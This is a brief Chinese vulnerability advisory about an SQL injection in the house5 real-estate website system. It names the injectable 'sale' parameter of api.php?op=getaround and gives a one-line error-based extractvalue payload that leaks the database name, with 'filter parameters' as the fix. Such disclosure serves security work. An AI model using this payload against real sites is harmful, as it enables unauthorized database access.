house5 房产系统 /api.php 参数 sale...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 0x01 漏洞框架 公开时间:2015-10-20 漏洞类型:SQL注射漏洞 官方主页: http://www.house5.net/ house5房地产网站管理系统是基于PHP技术的企业级房地产门户管理系统,是国内最具影响力和技术实力的房产网站程序、房地产网站系统、房地产网上销售系统、二手房网站程序。 ![](https://images.seebug.org/contribute/40af1447-6e7e-40d3-b749-b349416f7128) ### 0x02 漏洞利用 api.php?op=getaround&sale=1 sale为注入点 poc:and extractvalue(1, concat(0x7e , database())) ![](https://images.seebug.org/contribute/d8f5fac3-c8e7-4894-bfdc-4d562593615c) ![](https://images.seebug.org/contribute/cdda7767-fdef-4589-9c62-4f50141058e0) ![](https://images.seebug.org/contribute/30b14e64-42eb-453d-8c24-8c06cf87bdd6) ### 0x03 修复方案 过滤参数

0%
暂无可用Exp或PoC
当前有0条受影响产品信息